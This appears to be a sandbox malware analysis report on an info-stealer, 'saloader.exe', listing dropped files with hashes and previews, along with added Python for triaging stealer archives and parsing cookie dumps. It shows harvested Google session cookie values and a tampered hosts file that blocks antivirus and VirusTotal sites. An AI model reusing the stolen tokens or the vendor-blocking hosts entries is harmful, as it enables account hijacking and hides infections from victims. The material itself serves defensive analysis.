                                                                                        Preview:PK.........}Y.\"n....!...#...Browsers\Cookies\Chrome Cookies.txt}.Kr.0...u..(..D.]P...D.P.8T............i.:......I.o.P._:@....e.0*o....z@..... . [....B..D.....8......N.t.2....\j.8...5T_.h?$m(........?^..O.U..~NEu.>..4&.6HY.L~.....H..^?.P..1....|..i.v..|9.5.J^..*....K.q...9*....!.].Z.....R._PK.........}Y....&...zG......Display\Display.pngl{y8.k..3cd..Ba.K.pT......,Y..t...3.)Dv.0..c'..,c.....Xb.f0....9.....z.x.k...\s...,..W.M...g9..8mjbp..X.o!........\@.[...a....~.....{.[9...#........)....w..z.....^.....$T.Y.....n.l.z..'.`./.si.`{C..{..92R `...E..E.%r.0%.....%...<.h.+p..UW.v..@.wj.sX%R..3.~.w.-.zl.x..~?..[.....v.4..D..*^yG..D:.....N.|.j....tpV.u5.o......Y.u.}9....j.=A-_1..q..)C..pD..OC..._o$y.....H^...]H|x..P.r..\.E=...Z.9:....z...Db>...j.......s.......K..].....zK.....w.....C+?]..~6.*Y..g{-.<..,Sk"Y.1..S....w.J...y..'_.1.^..6H.7h.&.....+c|........).n.}..U..~.Oz..b.......L.]..&Zg.q..`.%.).0..5*^.!.1a.{......~..-FA1U.z.;.!.........0+...-.
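The archive above is the stealer's staging container: 655,149 bytes, deflate-compressed, with entry names `Browsers\Cookies\Chrome Cookies.txt` and `Display\Display.png` readable straight from the preview because ZIP local headers carry names in clear even when entry data is protected. Two things in the record deserve a check before the contents are written off as unreadable. The `Encrypted:true` flag sits next to an entropy of 7.998 and `compression method=deflate`; a deflate stream of already-compressed data (the 7.92-entropy PNG listed further down) scores just under 8 bits per byte whether or not a password was set, and the only authoritative signal is general-purpose flag bit 0 on each entry. The entry names also use backslashes, which the ZIP specification reserves against (forward slashes only); Windows-native writers, including .NET Framework's `ZipFile` before 4.6.1, produce them, and some extractors flatten or refuse such names, so paths should be normalised before grouping. The Python below is an added example, not code from the report or from the sample: it builds a constructed stand-in archive with the same entry layout (made-up contents, since the real bytes are not on the page) and triages it in memory, reporting entropy, the real encryption bit, separator style and the per-category entry list.

```python
import hashlib
import io
import math
import zipfile
from collections import Counter, defaultdict

# Constructed stand-in for the dropped archive. Entry names copy the layout
# visible in the report preview (backslash separators, Browsers\Cookies\...
# and Display\...); the contents are made up, since the real bytes are not
# on the page.
FAKE_COOKIE_TXT = (
    b".google.com\tTRUE\t/\tFALSE\t13343557341976489\t1P_JAR\t2023-10-05-07\r\n" * 40
)
# Deterministic pseudo-random bytes standing in for an already-compressed PNG:
# incompressible, like the real screenshot, so the archive's entropy lands
# near 8 bits/byte just as the report shows.
FAKE_PNG = b"\x89PNG\r\n\x1a\n" + b"".join(
    hashlib.sha256(i.to_bytes(4, "little")).digest() for i in range(2048)
)


def build_constructed_archive() -> bytes:
    """Write a deflate ZIP whose entry names keep Windows backslashes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in (
            ("Browsers\\Cookies\\Chrome Cookies.txt", FAKE_COOKIE_TXT),
            ("Display\\Display.png", FAKE_PNG),
        ):
            zi = zipfile.ZipInfo("placeholder")
            zi.filename = name  # bypasses ZipInfo's separator normalisation
            zi.compress_type = zipfile.ZIP_DEFLATED
            zf.writestr(zi, data)
    return buf.getvalue()


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, the same 8-bit entropy measure the report column uses."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def triage_archive(blob: bytes) -> dict:
    """Summarise a suspected stealer archive without extracting anything to disk."""
    summary = {
        "entropy": round(shannon_entropy(blob), 3),
        "password_protected": False,
        "backslash_paths": False,
        "entries": [],
        "by_category": defaultdict(list),
    }
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for zi in zf.infolist():
            # General-purpose bit 0 is the only authoritative "encrypted" signal;
            # high entropy alone cannot tell deflate output from ciphertext.
            if zi.flag_bits & 0x1:
                summary["password_protected"] = True
            if "\\" in zi.filename:
                summary["backslash_paths"] = True
            norm = zi.filename.replace("\\", "/")
            summary["by_category"][norm.split("/", 1)[0]].append(norm)
            summary["entries"].append((norm, zi.compress_size, zi.file_size))
    summary["by_category"] = dict(summary["by_category"])
    return summary


if __name__ == "__main__":
    report = triage_archive(build_constructed_archive())
    for key, val in report.items():
        print(f"{key}: {val}")
```

Run against the real dropped file, the same function tells you whether `Encrypted:true` means anything more than "deflate output", and the category list (`Browsers`, `Display`, and whatever else the sample collected) is the quickest inventory of what was exfiltrated.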
                                                                                        Process:C:\Users\user\Desktop\saloader.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):289
                                                                                        Entropy (8bit):5.865375252169314
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:Pk3rsLgxbh+3r4wyXfaaW3UnhzrWgOsH6/8hwDFI0BFOqv5:c7JH+74xva3UhyL/8ObW0
                                                                                        MD5:49EC633D95953041A44FF47D64F82A19
                                                                                        SHA1:EA9BD5B1F902BBFC4EC24A7AC5E99EF72436A2F4
                                                                                        SHA-256:3E64F1CCD635E18E72EF1A8F74640450AA7F2EC52529F28C03F473ECC5988A8F
                                                                                        SHA-512:D6A627F441FA70A81F8D3BDBFA63DA0F111FE83EC359321EC281C7D1569382A303091693625AB3B78B1EA2FB9068DCFFAE61F13FA24C6106B1F5183442FB4DF9
                                                                                        Malicious:false
                                                                                        Preview:.google.com.TRUE./.FALSE.13343557341976489.1P_JAR.2023-10-05-07...google.com.TRUE./.FALSE.13356776540976533.NID.511=nNadqW9uTcY0OP6I3afnr71o6EzaYLsdpW4UEYN3vYq_rbRrNFxM1jozPGuhjORBZKKMz2tdDpVe7dNuTWp4CyK-zt5Is6wVElveWAfKQgwNJiKKtXHCCCmrlgzZTl5CiKjTeA2iQqf6zlRK2h8wg1hVpIsWsaKqaWJyHMPF3JA..
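The 289-byte text file above is the harvested Chrome cookie dump in Netscape cookies.txt layout (domain, subdomain flag, path, secure flag, expiry, name, value). The preview renders every tab and CR/LF as a dot; assuming tab separators, the two visible lines come to exactly the 289 bytes the report gives for the file, so nothing is missing from the preview. The practitioner's caveat is the expiry column: `13343557341976489` and `13356776540976533` are not Unix seconds but Chromium's raw `expires_utc` values, microseconds since 1601-01-01 UTC, copied out of the Cookies database unchanged. A parser that assumes Unix seconds fails (the dates land hundreds of millions of years out); converted correctly they decode to 2023-11-04 07:42:21 UTC and 2024-04-05 07:42:20 UTC, thirty days and six months after the `1P_JAR` value `2023-10-05-07`, which dates the sandbox's browser profile rather than the analysis run. The Python below is an added example, not code from the report or from the sample: it reconstructs the dump from the preview under the tab-separator assumption, parses it, and handles both timestamp conventions.

```python
from datetime import datetime, timedelta, timezone
from typing import List, NamedTuple, Optional

# Reconstructed from the report preview, where the viewer shows every tab and
# CR/LF as a dot. Assumption: the separators are tabs (Netscape cookies.txt
# layout); with that assumption the text is exactly the 289 bytes the report
# gives for the file.
COOKIE_DUMP = (
    ".google.com\tTRUE\t/\tFALSE\t13343557341976489\t1P_JAR\t2023-10-05-07\r\n"
    ".google.com\tTRUE\t/\tFALSE\t13356776540976533\tNID\t"
    "511=nNadqW9uTcY0OP6I3afnr71o6EzaYLsdpW4UEYN3vYq_rbRrNFxM1jozPGuhjORBZKKMz2"
    "tdDpVe7dNuTWp4CyK-zt5Is6wVElveWAfKQgwNJiKKtXHCCCmrlgzZTl5CiKjTeA2iQqf6"
    "zlRK2h8wg1hVpIsWsaKqaWJyHMPF3JA\r\n"
)

WEBKIT_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
UNIX_EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)


class Cookie(NamedTuple):
    domain: str
    include_subdomains: bool
    path: str
    secure: bool
    expires: Optional[datetime]  # None for session cookies (expires_utc == 0)
    name: str
    value: str


def parse_expiry(raw: str) -> Optional[datetime]:
    """Accept either Unix seconds or Chromium's raw expires_utc value.

    Chromium stores expires_utc as microseconds since 1601-01-01 UTC. This dump
    copied that column unchanged into the Netscape "expires" field. A Unix
    value for any real-world date has 10 digits and a WebKit value has 17, so
    the magnitude disambiguates the two conventions.
    """
    n = int(raw)
    if n == 0:
        return None
    if n > 10**12:
        return WEBKIT_EPOCH + timedelta(microseconds=n)
    return UNIX_EPOCH + timedelta(seconds=n)


def parse_cookie_dump(text: str) -> List[Cookie]:
    """Parse a tab-separated Netscape-style cookie dump into Cookie records."""
    cookies: List[Cookie] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line or line.startswith("#"):
            continue
        fields = line.split("\t")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        domain, flag, path, secure, expires, name, value = fields
        cookies.append(
            Cookie(domain, flag == "TRUE", path, secure == "TRUE",
                   parse_expiry(expires), name, value)
        )
    return cookies


if __name__ == "__main__":
    print(f"{len(COOKIE_DUMP.encode('ascii'))} bytes")  # matches the report's size
    for c in parse_cookie_dump(COOKIE_DUMP):
        when = "session" if c.expires is None else c.expires.isoformat()
        print(f"{c.domain:<14} {c.name:<8} expires {when}")
```

The byte-count check in the main block is worth keeping as a habit: when a sandbox truncates a preview, comparing the reconstructed length with the reported size tells you whether you are looking at the whole file or only its head.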
                                                                                        Process:C:\Users\user\Desktop\saloader.exe
                                                                                        File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                        Category:dropped
                                                                                        Size (bytes):673658
                                                                                        Entropy (8bit):7.924583955574468
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:yKnJewDFXzRkdBLWN+S6gi3OYTc8iuSonCoLXb/MTNipTaBDVKx86lsD:yKnIm8ZWvVYTyulTX7MTWTah0qQk
                                                                                        MD5:14AB1A1DD4C4C47DFC412C8CD4A030B4
                                                                                        SHA1:19E95D1566E6714E5DF4BDE77B761D8BADCA2930
                                                                                        SHA-256:11D2CBDC08912CC95D395B0E721ED1441DF5760CDC98220985BA52543D694306
                                                                                        SHA-512:005642EE9BEDD42FE3B13BD24DC4A787836E353A6FC84B115498E8F54E030E0C66A9A89C03478DFB05FBD5C2E9C5279D5B943D17489D633032BBA2E887D5EE99
                                                                                        Malicious:false
                                                                                        Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..g.mWu....O....Z...We....^.{....(c.MR......D....6.a...I...F&.!@('.Y..Q..18`.7.1.v_c...^{.s$`..6.....G.....s4..G.r....?..;..2./g...u..v.0zM...l..o....;..{....Yi...L....W.2~.w..}....2..E..|k...o....r......K.u@..w..Xy.|{....s...3~......o..cl.........3..oLX.".?...Xy.../...R...W.b.a..[...._....v+O....O.e.+O......\...;....+O...<...b....>.!V..9...\v4...gz.S..v$.<..m..>3a.#..Q.{.q.......<.S....Yy.'. ..a...5...k..{.d.Z.zG`...X.....A.XC.G.....pC...v...5.x......PGbqn...;.v.:a....F./.}].../..%...qV..K........a|.k+.W.n..{..w..*g.yM..~WW.....bn.Y....3..v..Q..qz....VN....rU7..uN|...w+1.B=.3.....=e.E..1..G'_^s.w.s.....1.R>...8..U.S...w..N..2>..Il...u{N+.y.e.}..>.../..'|..;N*...UVN........a.)..8:.#.n.}...O..B..H......?...>VG..v.X.?..y.G+....'...%_p.r.+;..HYSS.......u.V.-..S>..t+G}..w.W.o....K'..c...-.9x.{...[..SrG..et..Rw..#..91.8y ....;/.X.|t....
                                                                                        Process:C:\Users\user\Desktop\saloader.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                        Category:dropped
                                                                                        Size (bytes):40960
                                                                                        Entropy (8bit):0.8553638852307782
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Users\user\Desktop\saloader.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                        Category:dropped
                                                                                        Size (bytes):20480
                                                                                        Entropy (8bit):0.6732424250451717
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                        MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                        SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                        SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                        SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Users\user\Desktop\saloader.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                        Category:dropped
                                                                                        Size (bytes):51200
                                                                                        Entropy (8bit):0.8746135976761988
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                        MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                        SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                        SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                        SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Users\user\Desktop\saloader.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                                        Category:dropped
                                                                                        Size (bytes):20480
                                                                                        Entropy (8bit):0.848598812124929
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
                                                                                        MD5:9664DAA86F8917816B588C715D97BE07
                                                                                        SHA1:FAD9771763CD861ED8F3A57004C4B371422B7761
                                                                                        SHA-256:8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
                                                                                        SHA-512:E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Users\user\Desktop\saloader.exe
                                                                                        File Type:ASCII text, with CRLF, LF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):2223
                                                                                        Entropy (8bit):4.573013811987098
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:vDZhyoZWM9rU5fFc7s9PI8A+VyUq8UwWsnNhUm:vDZEurK988TwU0wWsn/
                                                                                        MD5:C9901CB0AE22A9ABBD192B692AE4E2EB
                                                                                        SHA1:12976AC7024E5D1FF3FDF5E6A8251DC9C9205E39
                                                                                        SHA-256:3865EE9FBAF4813772CADE7B42A2E8AA8248734DD92FA5498D49947295E16EE0
                                                                                        SHA-512:E3E796F34E894C1B924B087CEC0CCA928BFD6FED71C462F30E79264EC3BF5353C434C69094FFB9EE0C3AD6DE694AA0B13B5490013AB1C28452C1CDC19C4F0E6F
                                                                                        Malicious:true
                                                                                        Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost...0.0.0.0 virustotal.com..0.0.0.0 www.virustotal.com..0.0.0.0 avast.com..0.0.0.0 www.avast.com..0.0.0.0 totalav.com..0.0.0.0 www.totalav.com..0.0.0.0 scanguard.com..0.0.0.0 www.
                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Entropy (8bit):6.050139535659894
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                        • Windows Screen Saver (13104/52) 0.07%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                        File name:saloader.exe
                                                                                        File size:235'008 bytes
                                                                                        MD5:1e10af7811808fc24065f18535cf1220
                                                                                        SHA1:65995bcb862aa66988e1bb0dbff75dcac9b400c7
                                                                                        SHA256:e07fd0ac793b06603be164c9ee73465af512cf17bed07614cbcd2a8410f04eed
                                                                                        SHA512:f1c623918a3701254805e7648d671b316446a0f98637d3de62d44331cf91502afb57ccb762472491bc4ac037fbf5f7b624eb9d39092b3be0b2ed84da6f3acadc
                                                                                        SSDEEP:6144:lloZMQfsXtioRkts/cnnK6cMldKRn/1+mpnsl3ySXCkb8e1muhi:noZItlRk83MldKRn/1+mpnsl3ySXze
                                                                                        TLSH:14346B4933B8CB17E25F9BBDD5B0549F87B1F143E80AF78E0C8895E82421B42E949E57
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l.a..........."...0.................. ........@.. ....................................`................................
                                                                                        Icon Hash:00928e8e8686b000
                                                                                        Entrypoint:0x43aa9e
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0x9C61056C [Wed Feb 19 18:54:36 2053 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:4
                                                                                        OS Version Minor:0
                                                                                        File Version Major:4
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:4
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                        Instruction
                                                                                        jmp dword ptr [00402000h]
                                                                                        Name                                  Virtual Address  Virtual Size  Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT          0x3aa4c          0x4f          .text
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE        0x3c000          0x550         .rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC       0x3e000          0xc           .reloc
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG           0x3aa30          0x1c          .text
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
